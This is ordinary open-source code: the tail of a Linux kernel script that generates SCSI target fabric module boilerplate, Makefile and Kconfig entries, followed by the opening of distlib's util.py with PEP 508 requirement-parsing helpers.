pi = open(fi, 'w')
if not pi:
tcm_mod_err("Unable to open file: " + fi)
buf = "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/list.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n"
buf += "#include <scsi/scsi.h>\n"
buf += "#include <scsi/scsi_host.h>\n"
buf += "#include <scsi/scsi_device.h>\n"
buf += "#include <scsi/scsi_cmnd.h>\n"
buf += "#include <scsi/libfc.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_transport.h>\n"
buf += "#include <target/target_core_fabric_ops.h>\n"
buf += "#include <target/target_core_fabric_lib.h>\n"
buf += "#include <target/target_core_device.h>\n"
buf += "#include <target/target_core_tpg.h>\n"
buf += "#include <target/target_core_configfs.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "int " + fabric_mod_name + "_check_true(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_true(struct se_portal_group *);\n"
buf += "int " + fabric_mod_name + "_check_false(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_false(struct se_portal_group *);\n"
total_fabric_ops = len(fabric_ops)
i = 0
while i < total_fabric_ops:
fo = fabric_ops[i]
i += 1
# print "fabric_ops: " + fo
if re.search('get_fabric_name', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_name(void)\n"
buf += "{\n"
buf += " return \"" + fabric_mod_name[4:] + "\";\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_name(void);\n"
continue
if re.search('get_fabric_proto_ident', fo):
buf += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " u8 proto_id;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " proto_id = fc_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " proto_id = sas_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " proto_id = iscsi_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return proto_id;\n"
buf += "}\n\n"
bufi += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *);\n"
if re.search('get_wwn', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_name[0];\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *);\n"
if re.search('get_tag', fo):
buf += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " return tpg->" + fabric_mod_port + "_tpgt;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *);\n"
if re.search('get_default_depth', fo):
buf += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *);\n"
if re.search('get_pr_transport_id\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code,\n"
buf += " unsigned char *buf)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *, unsigned char *);\n"
if re.search('get_pr_transport_id_len\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *);\n"
if re.search('parse_pr_out_transport_id\)\(', fo):
buf += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " const char *buf,\n"
buf += " u32 *out_tid_len,\n"
buf += " char **port_nexus_ptr)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " char *tid = NULL;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " tid = fc_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " tid = sas_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " tid = iscsi_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
buf += " }\n\n"
buf += " return tid;\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(struct se_portal_group *,\n"
bufi += " const char *, u32 *, char **);\n"
if re.search('alloc_fabric_acl\)\(', fo):
buf += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n\n"
buf += " nacl = kzalloc(sizeof(struct " + fabric_mod_name + "_nacl), GFP_KERNEL);\n"
buf += " if (!(nacl)) {\n"
buf += " printk(KERN_ERR \"Unable to alocate struct " + fabric_mod_name + "_nacl\\n\");\n"
buf += " return NULL;\n"
buf += " }\n\n"
buf += " return &nacl->se_node_acl;\n"
buf += "}\n\n"
bufi += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *);\n"
if re.search('release_fabric_acl\)\(', fo):
buf += "void " + fabric_mod_name + "_release_fabric_acl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_nacl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_fabric_acl(struct se_portal_group *,\n"
bufi += " struct se_node_acl *);\n"
if re.search('tpg_get_inst_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *);\n"
if re.search('release_cmd_to_pool', fo):
buf += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *);\n"
if re.search('shutdown_session\)\(', fo):
buf += "int " + fabric_mod_name + "_shutdown_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_shutdown_session(struct se_session *);\n"
if re.search('close_session\)\(', fo):
buf += "void " + fabric_mod_name + "_close_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_close_session(struct se_session *);\n"
if re.search('stop_session\)\(', fo):
buf += "void " + fabric_mod_name + "_stop_session(struct se_session *se_sess, int sess_sleep , int conn_sleep)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_stop_session(struct se_session *, int, int);\n"
if re.search('fall_back_to_erl0\)\(', fo):
buf += "void " + fabric_mod_name + "_reset_nexus(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_reset_nexus(struct se_session *);\n"
if re.search('sess_logged_in\)\(', fo):
buf += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *);\n"
if re.search('sess_get_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *);\n"
if re.search('write_pending\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending(struct se_cmd *);\n"
if re.search('write_pending_status\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *);\n"
if re.search('set_default_node_attributes\)\(', fo):
buf += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *nacl)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *);\n"
if re.search('get_task_tag\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *);\n"
if re.search('get_cmd_state\)\(', fo):
buf += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *);\n"
if re.search('new_cmd_failure\)\(', fo):
buf += "void " + fabric_mod_name + "_new_cmd_failure(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_new_cmd_failure(struct se_cmd *);\n"
if re.search('queue_data_in\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *);\n"
if re.search('queue_status\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_status(struct se_cmd *);\n"
if re.search('queue_tm_rsp\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *);\n"
if re.search('get_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void);\n"
if re.search('set_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *se_cmd, u32 sense_length)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *, u32);\n"
if re.search('is_state_remove\)\(', fo):
buf += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *);\n"
if re.search('pack_lun\)\(', fo):
buf += "u64 " + fabric_mod_name + "_pack_lun(unsigned int lun)\n"
buf += "{\n"
buf += " WARN_ON(lun >= 256);\n"
buf += " /* Caller wants this byte-swapped */\n"
buf += " return cpu_to_le64((lun & 0xff) << 8);\n"
buf += "}\n\n"
bufi += "u64 " + fabric_mod_name + "_pack_lun(unsigned int);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
ret = pi.write(bufi)
if ret:
tcm_mod_err("Unable to write fi: " + fi)
pi.close()
return
def tcm_mod_build_kbuild(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Makefile"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf += fabric_mod_name + "-objs := " + fabric_mod_name + "_fabric.o \\\n"
buf += " " + fabric_mod_name + "_configfs.o\n"
buf += "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name + ".o\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_build_kconfig(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Kconfig"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "config " + fabric_mod_name.upper() + "\n"
buf += " tristate \"" + fabric_mod_name.upper() + " fabric module\"\n"
buf += " depends on TARGET_CORE && CONFIGFS_FS\n"
buf += " default n\n"
buf += " ---help---\n"
buf += " Say Y here to enable the " + fabric_mod_name.upper() + " fabric module\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_add_kbuild(tcm_dir, fabric_mod_name):
    """Append the new module's subdirectory to drivers/target/Makefile."""
    entry = "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name.lower() + "/\n"
    kbuild = tcm_dir + "/drivers/target/Makefile"
    # Open in append mode so existing entries are preserved.
    handle = open(kbuild, 'a')
    handle.write(entry)
    handle.close()
    return
def tcm_mod_add_kconfig(tcm_dir, fabric_mod_name):
    """Append a source line for the new module to drivers/target/Kconfig."""
    entry = "source \"drivers/target/" + fabric_mod_name.lower() + "/Kconfig\"\n"
    kconfig = tcm_dir + "/drivers/target/Kconfig"
    # Open in append mode so existing entries are preserved.
    handle = open(kconfig, 'a')
    handle.write(entry)
    handle.close()
    return
def main(modname, proto_ident):
# proto_ident = "FC"
# proto_ident = "SAS"
# proto_ident = "iSCSI"
tcm_dir = os.getcwd();
tcm_dir += "/../../"
print "tcm_dir: " + tcm_dir
fabric_mod_name = modname
fabric_mod_dir = tcm_dir + "drivers/target/" + fabric_mod_name
print "Set fabric_mod_name: " + fabric_mod_name
print "Set fabric_mod_dir: " + fabric_mod_dir
print "Using proto_ident: " + proto_ident
if proto_ident != "FC" and proto_ident != "SAS" and proto_ident != "iSCSI":
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
ret = tcm_mod_create_module_subdir(fabric_mod_dir)
if ret:
print "tcm_mod_create_module_subdir() failed because module already exists!"
sys.exit(1)
tcm_mod_build_base_includes(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_scan_fabric_ops(tcm_dir)
tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_configfs(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kbuild(fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kconfig(fabric_mod_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Makefile..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kbuild(tcm_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Kconfig..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kconfig(tcm_dir, fabric_mod_name)
return
# Command-line interface: both options are mandatory.
parser = optparse.OptionParser()
parser.add_option('-m', '--modulename', help='Module name', dest='modname',
                  action='store', nargs=1, type='string')
parser.add_option('-p', '--protoident', help='Protocol Ident', dest='protoident',
                  action='store', nargs=1, type='string')
(opts, args) = parser.parse_args()

# Bail out with usage help if either mandatory option was omitted.
mandatories = ['modname', 'protoident']
for m in mandatories:
    if not opts.__dict__[m]:
        print "mandatory option is missing\n"
        parser.print_help()
        exit(-1)

if __name__ == "__main__":
    main(str(opts.modname), opts.protoident)
|
kenshay/ImageScripter | refs/heads/master | Script_Runner/PYTHON/Lib/site-packages/pip/_vendor/distlib/util.py | 24 | #
# Copyright (C) 2012-2017 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import socket
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
import subprocess
import sys
import tarfile
import tempfile
import textwrap
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import time
from . import DistlibException
from .compat import (string_types, text_type, shutil, raw_input, StringIO,
cache_from_source, urlopen, urljoin, httplib, xmlrpclib,
splittype, HTTPHandler, BaseConfigurator, valid_ident,
Container, configparser, URLError, ZipFile, fsdecode,
unquote, urlparse)
logger = logging.getLogger(__name__)

#
# Requirement parsing code as per PEP 508
#

# Distribution or marker-variable name, e.g. 'requests' or 'os_name'.
IDENTIFIER = re.compile(r'^([\w\.-]+)\s*')
# Version string; additionally allows '*' and '+' (e.g. '1.0.*').
VERSION_IDENTIFIER = re.compile(r'^([\w\.*+-]+)\s*')
# Version comparison operators: <, <=, >, >=, ==, ===, ~=, !=.
COMPARE_OP = re.compile(r'^(<=?|>=?|={2,3}|[~!]=)\s*')
# Marker operators: the comparison operators plus 'in' / 'not in'.
MARKER_OP = re.compile(r'^((<=?)|(>=?)|={2,3}|[~!]=|in|not\s+in)\s*')
OR = re.compile(r'^or\b\s*')
AND = re.compile(r'^and\b\s*')
# One run of non-whitespace (used for URI extraction).
NON_SPACE = re.compile(r'(\S+)\s*')
# Characters permitted inside a quoted marker string literal.
STRING_CHUNK = re.compile(r'([\s\w\.{}()*+#:;,/?!~`@$%^&=|<>\[\]-]+)')
def parse_marker(marker_string):
    """
    Parse a marker string and return a dictionary containing a marker expression.

    The dictionary will contain keys "op", "lhs" and "rhs" for non-terminals in
    the expression grammar, or strings. A string contained in quotes is to be
    interpreted as a literal string, and a string not contained in quotes is a
    variable (such as os_name).

    Implemented as a small recursive-descent parser; each helper consumes
    from the front of *remaining* and returns (result, rest-of-input).
    """
    def marker_var(remaining):
        # either identifier, or literal string
        m = IDENTIFIER.match(remaining)
        if m:
            result = m.groups()[0]
            remaining = remaining[m.end():]
        elif not remaining:
            raise SyntaxError('unexpected end of input')
        else:
            # Must be a quoted literal; the first character is the quote.
            q = remaining[0]
            if q not in '\'"':
                raise SyntaxError('invalid expression: %s' % remaining)
            oq = '\'"'.replace(q, '')  # the "other" quote character
            remaining = remaining[1:]
            parts = [q]
            while remaining:
                # either a string chunk, or oq, or q to terminate
                if remaining[0] == q:
                    break
                elif remaining[0] == oq:
                    parts.append(oq)
                    remaining = remaining[1:]
                else:
                    m = STRING_CHUNK.match(remaining)
                    if not m:
                        raise SyntaxError('error in string literal: %s' % remaining)
                    parts.append(m.groups()[0])
                    remaining = remaining[m.end():]
            else:
                # while-else: input ran out before the closing quote appeared
                s = ''.join(parts)
                raise SyntaxError('unterminated string: %s' % s)
            parts.append(q)
            result = ''.join(parts)
            remaining = remaining[1:].lstrip() # skip past closing quote
        return result, remaining

    def marker_expr(remaining):
        # expr := '(' marker ')' | var (op var)*
        if remaining and remaining[0] == '(':
            result, remaining = marker(remaining[1:].lstrip())
            if remaining[0] != ')':
                raise SyntaxError('unterminated parenthesis: %s' % remaining)
            remaining = remaining[1:].lstrip()
        else:
            lhs, remaining = marker_var(remaining)
            while remaining:
                m = MARKER_OP.match(remaining)
                if not m:
                    break
                op = m.groups()[0]
                remaining = remaining[m.end():]
                rhs, remaining = marker_var(remaining)
                # comparisons associate to the left
                lhs = {'op': op, 'lhs': lhs, 'rhs': rhs}
            result = lhs
        return result, remaining

    def marker_and(remaining):
        # and := expr ('and' expr)*
        lhs, remaining = marker_expr(remaining)
        while remaining:
            m = AND.match(remaining)
            if not m:
                break
            remaining = remaining[m.end():]
            rhs, remaining = marker_expr(remaining)
            lhs = {'op': 'and', 'lhs': lhs, 'rhs': rhs}
        return lhs, remaining

    def marker(remaining):
        # marker := and ('or' and)* -- 'or' binds loosest
        lhs, remaining = marker_and(remaining)
        while remaining:
            m = OR.match(remaining)
            if not m:
                break
            remaining = remaining[m.end():]
            rhs, remaining = marker_and(remaining)
            lhs = {'op': 'or', 'lhs': lhs, 'rhs': rhs}
        return lhs, remaining

    return marker(marker_string)
def parse_requirement(req):
    """
    Parse a requirement passed in as a string. Return a Container
    whose attributes contain the various parts of the requirement.

    Returns None for blank lines and comment lines.  Raises SyntaxError
    on malformed input.
    """
    remaining = req.strip()
    if not remaining or remaining.startswith('#'):
        return None
    m = IDENTIFIER.match(remaining)
    if not m:
        raise SyntaxError('name expected: %s' % remaining)
    distname = m.groups()[0]
    remaining = remaining[m.end():]
    extras = mark_expr = versions = uri = None
    # Optional '[extra1, extra2, ...]' part.
    if remaining and remaining[0] == '[':
        i = remaining.find(']', 1)
        if i < 0:
            raise SyntaxError('unterminated extra: %s' % remaining)
        s = remaining[1:i]
        remaining = remaining[i + 1:].lstrip()
        extras = []
        while s:
            m = IDENTIFIER.match(s)
            if not m:
                raise SyntaxError('malformed extra: %s' % s)
            extras.append(m.groups()[0])
            s = s[m.end():]
            if not s:
                break
            if s[0] != ',':
                raise SyntaxError('comma expected in extras: %s' % s)
            s = s[1:].lstrip()
        if not extras:
            extras = None
    if remaining:
        if remaining[0] == '@':
            # it's a URI
            remaining = remaining[1:].lstrip()
            m = NON_SPACE.match(remaining)
            if not m:
                raise SyntaxError('invalid URI: %s' % remaining)
            uri = m.groups()[0]
            t = urlparse(uri)
            # there are issues with Python and URL parsing, so this test
            # is a bit crude. See bpo-20271, bpo-23505. Python doesn't
            # always parse invalid URLs correctly - it should raise
            # exceptions for malformed URLs
            if not (t.scheme and t.netloc):
                raise SyntaxError('Invalid URL: %s' % uri)
            remaining = remaining[m.end():].lstrip()
        else:

            def get_versions(ver_remaining):
                """
                Return a list of operator, version tuples if any are
                specified, else None.
                """
                m = COMPARE_OP.match(ver_remaining)
                versions = None
                if m:
                    versions = []
                    while True:
                        op = m.groups()[0]
                        ver_remaining = ver_remaining[m.end():]
                        m = VERSION_IDENTIFIER.match(ver_remaining)
                        if not m:
                            raise SyntaxError('invalid version: %s' % ver_remaining)
                        v = m.groups()[0]
                        versions.append((op, v))
                        ver_remaining = ver_remaining[m.end():]
                        # constraints are comma-separated
                        if not ver_remaining or ver_remaining[0] != ',':
                            break
                        ver_remaining = ver_remaining[1:].lstrip()
                        m = COMPARE_OP.match(ver_remaining)
                        if not m:
                            raise SyntaxError('invalid constraint: %s' % ver_remaining)
                    if not versions:
                        versions = None
                return versions, ver_remaining

            if remaining[0] != '(':
                versions, remaining = get_versions(remaining)
            else:
                i = remaining.find(')', 1)
                if i < 0:
                    raise SyntaxError('unterminated parenthesis: %s' % remaining)
                s = remaining[1:i]
                remaining = remaining[i + 1:].lstrip()
                # As a special diversion from PEP 508, allow a version number
                # a.b.c in parentheses as a synonym for ~= a.b.c (because this
                # is allowed in earlier PEPs)
                if COMPARE_OP.match(s):
                    versions, _ = get_versions(s)
                else:
                    m = VERSION_IDENTIFIER.match(s)
                    if not m:
                        raise SyntaxError('invalid constraint: %s' % s)
                    v = m.groups()[0]
                    s = s[m.end():].lstrip()
                    if s:
                        raise SyntaxError('invalid constraint: %s' % s)
                    versions = [('~=', v)]
    # Optional environment marker after ';'.
    if remaining:
        if remaining[0] != ';':
            raise SyntaxError('invalid requirement: %s' % remaining)
        remaining = remaining[1:].lstrip()
        mark_expr, remaining = parse_marker(remaining)
    if remaining and remaining[0] != '#':
        raise SyntaxError('unexpected trailing data: %s' % remaining)
    if not versions:
        rs = distname
    else:
        rs = '%s %s' % (distname, ', '.join(['%s %s' % con for con in versions]))
    return Container(name=distname, extras=extras, constraints=versions,
                     marker=mark_expr, url=uri, requirement=rs)
def get_resources_dests(resources_root, rules):
    """Find destinations for resources files"""
    def rel_to(root, path):
        # normalise separators to '/', then strip the root prefix
        root = root.replace(os.path.sep, '/')
        path = path.replace(os.path.sep, '/')
        assert path.startswith(root)
        return path[len(root):].lstrip('/')

    destinations = {}
    for base, suffix, dest in rules:
        prefix = os.path.join(resources_root, base)
        for abs_base in iglob(prefix):
            for abs_path in iglob(os.path.join(abs_base, suffix)):
                resource_file = rel_to(resources_root, abs_path)
                if dest is None:
                    # a None destination removes any earlier mapping
                    destinations.pop(resource_file, None)
                else:
                    tail = rel_to(abs_base, abs_path)
                    head = dest.replace(os.path.sep, '/').rstrip('/')
                    destinations[resource_file] = head + '/' + tail
    return destinations
def in_venv():
    """Return True when running inside a virtual environment."""
    # virtualenv sets sys.real_prefix; PEP 405 venvs differ in base_prefix.
    if hasattr(sys, 'real_prefix'):
        return True
    return sys.prefix != getattr(sys, 'base_prefix', sys.prefix)
def get_executable():
    """Return the normalised path of the running interpreter as text."""
    # Historical note: a __PYVENV_LAUNCHER__ workaround for OS X used to
    # live here; sys.executable now points at the stub directly.
    path = os.path.normcase(sys.executable)
    if isinstance(path, text_type):
        return path
    return fsdecode(path)
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
    """Prompt until the reply's first letter (lowercased) is in
